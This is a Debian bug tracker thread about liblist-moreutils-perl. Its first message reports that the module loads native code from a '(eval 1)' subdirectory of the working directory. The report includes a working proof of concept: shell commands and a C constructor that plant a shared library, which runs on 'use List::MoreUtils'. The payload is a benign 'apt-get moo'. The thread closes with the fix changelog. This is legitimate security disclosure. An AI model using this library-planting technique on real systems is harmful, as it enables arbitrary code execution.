Bug#829138: marked as done (liblist-moreutils-perl: tries to load code from cwd)

Mon, 04 Jul 2016 10:51:34 -0700 

Your message dated Mon, 04 Jul 2016 17:49:54 +0000
with message-id <[email protected]>
and subject line Bug#829138: fixed in liblist-moreutils-perl 0.415-1
has caused the Debian Bug report #829138,
regarding liblist-moreutils-perl: tries to load code from cwd
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
829138: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=829138
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message --- 
Package: liblist-moreutils-perl
Version: 0.413-1+b1
Tags: security
Control: affects -1 + check-all-the-things
List::MoreUtils tries to load code from a subdirectory of the current working directory. This could lead to execution of arbitrary code if cwd is untrusted. 

Proof of concept:

$ mkdir -p '(eval 1)/auto/List/MoreUtils/'
$ gcc -Wall -fPIC -shared moo.c -o '(eval 1)/auto/List/MoreUtils/MoreUtils.so'
$ perl -e 'no lib "."; use List::MoreUtils'
                (__)
                (oo)
          /------\/
         / |    ||
        *  /\---/\
           ~~   ~~
..."Have you mooed today?"...
Segmentation fault


-- System Information:
Debian Release: stretch/sid
 APT prefers unstable
 APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)
Foreign Architectures: amd64

Kernel: Linux 4.6.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

Versions of packages liblist-moreutils-perl depends on:
ii  libc6                       2.22-13
ii  libexporter-tiny-perl       0.042-1
ii  perl                        5.22.2-1
ii  perl-base [perlapi-5.22.1]  5.22.2-1

--
Jakub Wilk

#include <signal.h>
#include <stdlib.h>
void __attribute__((constructor)) moo() {
	system("apt-get moo");
	kill(0, SIGSEGV);
}

--- End Message ---
--- Begin Message --- 
Source: liblist-moreutils-perl
Source-Version: 0.415-1

We believe that the bug you reported is fixed in the latest version of
liblist-moreutils-perl, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <[email protected]> (supplier of updated 
liblist-moreutils-perl package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Mon, 04 Jul 2016 19:20:03 +0200
Source: liblist-moreutils-perl
Binary: liblist-moreutils-perl
Architecture: source
Version: 0.415-1
Distribution: unstable
Urgency: medium
Maintainer: Debian Perl Group <[email protected]>
Changed-By: Salvatore Bonaccorso <[email protected]>
Closes: 829138
Description: 
 liblist-moreutils-perl - Perl module with additional list functions not found 
in List::Uti
Changes:
 liblist-moreutils-perl (0.415-1) unstable; urgency=medium
 .
   * Team upload.
 .
   [ Salvatore Bonaccorso ]
   * debian/control: Use HTTPS transport protocol for Vcs-Git URI
 .
   [ gregor herrmann ]
   * debian/copyright: change Copyright-Format 1.0 URL to HTTPS.
   * debian/upstream/metadata: change GitHub/CPAN URL(s) to HTTPS.
 .
   [ Salvatore Bonaccorso ]
   * Import upstream version 0.415
   * Update copyright years for upstream files
   * Update copyright years for included Config::AutoConf
   * Simplify Build-Depends on just only perl.
     The alternative version used as well to enforce the right version for
     Test::More is already satisfied in wheezy. Make only a Build-Depends to
     perl (unversioned).
   * Declare compliance with Debian policy 3.9.8
   * Drop unneeded patch makefile-author.patch (resolved in different way
     upstream)
   * debian/rules: Build enabling all hardening flags
   * Add patch to fix spelling errors in Contributing POD
   * Fix caller information passed down the stack.
     List/MoreUtils/XS.pm calls XSLoader::load from inside a string eval
     leading to the path used by XSLoader to determine the library to be
     (eval 1)/List/MoreUtils/XS.pm.
     Thanks to Jakub Wilk <[email protected]> (Closes: #829138)
Checksums-Sha1: 
 6524bff313b3d83eda33d23243e6997bff59beef 2307 
liblist-moreutils-perl_0.415-1.dsc
 6a067e7b40cdb1ae3a0acc6e55a93302c6a28477 132151 
liblist-moreutils-perl_0.415.orig.tar.gz
 6e49dd5b1e2cf10c33d20834bc5036bd3a31b70a 6404 
liblist-moreutils-perl_0.415-1.debian.tar.xz
Checksums-Sha256: 
 f350177059af356537bd21f0d126fb372c37cae3a33047dcb73e6720da34eda1 2307 
liblist-moreutils-perl_0.415-1.dsc
 568e093563cb2421db9d4ffc5ee4cefc3c6d7d9fe7a9d862f1584199b6394f7a 132151 
liblist-moreutils-perl_0.415.orig.tar.gz
 f2655bdb9a64617e569c88504b3cfd465c3aa6bb31f63ed1d49c47270c62194e 6404 
liblist-moreutils-perl_0.415-1.debian.tar.xz
Files: 
 9082cd69a3b88e772c474e1a3e571c66 2307 perl optional 
liblist-moreutils-perl_0.415-1.dsc
 a8e42767dd4f41f51b96749efe5ef31a 132151 perl optional 
liblist-moreutils-perl_0.415.orig.tar.gz
 91ae485f1f802790ce980b9db7497dee 6404 perl optional 
liblist-moreutils-perl_0.415-1.debian.tar.xz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJXepwxAAoJEAVMuPMTQ89Evw4P/AmMugWkvBoMadNNUEYQCknN
VvRXjEwuzZ7x50sTK+ReSI5j1ffZ+MKh1mniTBf/6dbUa4ix5ySkW5duLQeKZWsR
vNopxBZjT/KiKsAj28rqbuwvicaAlNu7ZJDqCveTUPIsTAThhdX9CDD1+HGidKgu
5UqC9js+ktVpOTOWrpsuu/GQpgTlfIVlNzW+vnLsWRfAdORw5oAXu3+/KuLIN6IN
hN087oIGS8dfrHfsQ2JSGNrJeSL5eWdFXL1LLOsqnL91PmkVjB2Di/AFtdvl2eIV
c4bKV3DY7hEbZxMWtk0LRCKAzxCX+f6vQi7vFTzmczjrjemNNegVYMyaMdmoyv1h
zAaE5YIpXRcRDPtVqr3Xm16y03e0CgDoxizlfOpfL4buLcF3yrFBJKGfJtZMJcI8
X1c8bK7rhWLr29LSLMIm3LuDzO1dgN0IPVvV4L/gvj3vFTRHOp/LfxzChOJMo0d2
O2yzi1ZgEl1Gc0CoPcHFpUwaxOlFwuNFCMNEc7x8blFFHrFqBidG6+hoYFxqRRkU
0qO/rBTcCypeJTM2Ngy+SktgCKqTF4wO215aYBjFdrUixmEHr+QyFFV0FPwLzBPn
hkYNoOUf4fkddm9eNhIDYnbZaAhKrKvmxq5h+hVK8YWrKtjtKnhh2cN+n0FXOQYS
oi/EwzJbxqzz12wNdm57
=SAzm
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to